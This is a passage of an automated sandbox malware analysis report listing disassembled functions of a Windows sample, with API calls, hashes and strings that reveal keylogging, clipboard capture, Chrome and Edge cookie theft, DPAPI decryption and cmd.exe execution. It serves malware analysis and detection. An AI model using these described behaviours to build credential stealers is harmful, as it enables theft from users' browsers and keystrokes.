                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                • String ID: /sort "Visit Time" /stext "$0NG
                                • API String ID: 368326130-3219657780
                                • Opcode ID: d963c8d89b197f9409bafdf1745426201732e41158af402883962d053e6a3de4
                                • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                • Opcode Fuzzy Hash: d963c8d89b197f9409bafdf1745426201732e41158af402883962d053e6a3de4
                                • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044EF58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                  • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                  • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • _free.LIBCMT ref: 0044EFD0
                                • _free.LIBCMT ref: 0044F006
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast_abort
                                • String ID: x9k$x9k
                                • API String ID: 2991157371-774530528
                                • Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                                • Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                                • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B748 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • __Init_thread_footer.LIBCMT ref: 0040B797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]$hdF
                                • API String ID: 1881088180-1379921833
                                • Opcode ID: f72f7acb6e995bab9069cebdaf7e12266999cf1a5a480981143d2b12499a9b58
                                • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                • Opcode Fuzzy Hash: f72f7acb6e995bab9069cebdaf7e12266999cf1a5a480981143d2b12499a9b58
                                • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 004162F5
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                  • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen$CloseCreateValue
                                • String ID: !D@$okmode$PG
                                • API String ID: 3411444782-3370592832
                                • Opcode ID: e94b0a6c45d23510be90e878902f1406fdc2ec5ccb27bc0872e50a1f898fac6a
                                • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                • Opcode Fuzzy Hash: e94b0a6c45d23510be90e878902f1406fdc2ec5ccb27bc0872e50a1f898fac6a
                                • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                Strings
                                • User Data\Default\Network\Cookies, xrefs: 0040C603
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 3f7452b16761e1584c8e2d429d91126a521682e32829e5e9204bb30330905886
                                • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                • Opcode Fuzzy Hash: 3f7452b16761e1584c8e2d429d91126a521682e32829e5e9204bb30330905886
                                • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                Strings
                                • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                • API String ID: 1174141254-1980882731
                                • Opcode ID: 6cf461605f9a2c7fe8b2ad0f04ad55fadbe866efa039c7f8a040f60605f6135f
                                • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                • Opcode Fuzzy Hash: 6cf461605f9a2c7fe8b2ad0f04ad55fadbe866efa039c7f8a040f60605f6135f
                                • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                • wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                • API String ID: 1497725170-1359877963
                                • Opcode ID: 146ec40d80975ce460983ba45166e756595be86b93ab3a07005c0417d446001b
                                • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                • Opcode Fuzzy Hash: 146ec40d80975ce460983ba45166e756595be86b93ab3a07005c0417d446001b
                                • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTime$wsprintf
                                • String ID: Online Keylogger Started
                                • API String ID: 112202259-1258561607
                                • Opcode ID: 18c80faa916e37ff587b460602bbba5bb4c1a333ebe42aa4448383553abdc9cc
                                • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                • Opcode Fuzzy Hash: 18c80faa916e37ff587b460602bbba5bb4c1a333ebe42aa4448383553abdc9cc
                                • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044BD6C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(00000000,00000000,0040F3BB,?,0044BC8A,0040F3BB,0046EBB0,0000000C), ref: 0044BDC2
                                • GetLastError.KERNEL32(?,0044BC8A,0040F3BB,0046EBB0,0000000C), ref: 0044BDCC
                                • __dosmaperr.LIBCMT ref: 0044BDF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID: H\k
                                • API String ID: 2583163307-1302769634
                                • Opcode ID: c386fb262ac1df75f9233a8cbac1a47ba8a32ae4ab5a4414f4170ecae5b11561
                                • Instruction ID: 6d8ae8a68538518658f59cc4ec35c635b4eb055c917d93d15d596e37dde74a72
                                • Opcode Fuzzy Hash: c386fb262ac1df75f9233a8cbac1a47ba8a32ae4ab5a4414f4170ecae5b11561
                                • Instruction Fuzzy Hash: 59010832A0426066E62462399C4577F6749CB92739F2546AFFD14872D3DB6CCC8182D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                • SetEvent.KERNEL32(?), ref: 004051D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: b2d32d1c486696acff87f5af967792298d31230c8842a0f6a1d2fc38208b6c67
                                • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                • Opcode Fuzzy Hash: b2d32d1c486696acff87f5af967792298d31230c8842a0f6a1d2fc38208b6c67
                                • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041381F
                                • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,Pj), ref: 0041384D
                                • RegCloseKey.ADVAPI32(?,?,0040F823,pth_unenc,Pj), ref: 00413858
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: pth_unenc
                                • API String ID: 1818849710-4028850238
                                • Opcode ID: 05bf175528813bc9b9993d83c1793f80e43b850aacd1f889012fd8a578c3b476
                                • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                • Opcode Fuzzy Hash: 05bf175528813bc9b9993d83c1793f80e43b850aacd1f889012fd8a578c3b476
                                • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                • String ID: bad locale name
                                • API String ID: 3628047217-1405518554
                                • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                • ShowWindow.USER32(00000009), ref: 00416C61
                                • SetForegroundWindow.USER32 ref: 00416C6D
                                  • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                  • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                  • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                  • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                • String ID: !D@
                                • API String ID: 186401046-604454484
                                • Opcode ID: 2b91b2f08cb42d6db95f8e8b14237b809d5a14eb7cc4a15ba04d3927bf9cc9fe
                                • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                • Opcode Fuzzy Hash: 2b91b2f08cb42d6db95f8e8b14237b809d5a14eb7cc4a15ba04d3927bf9cc9fe
                                • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
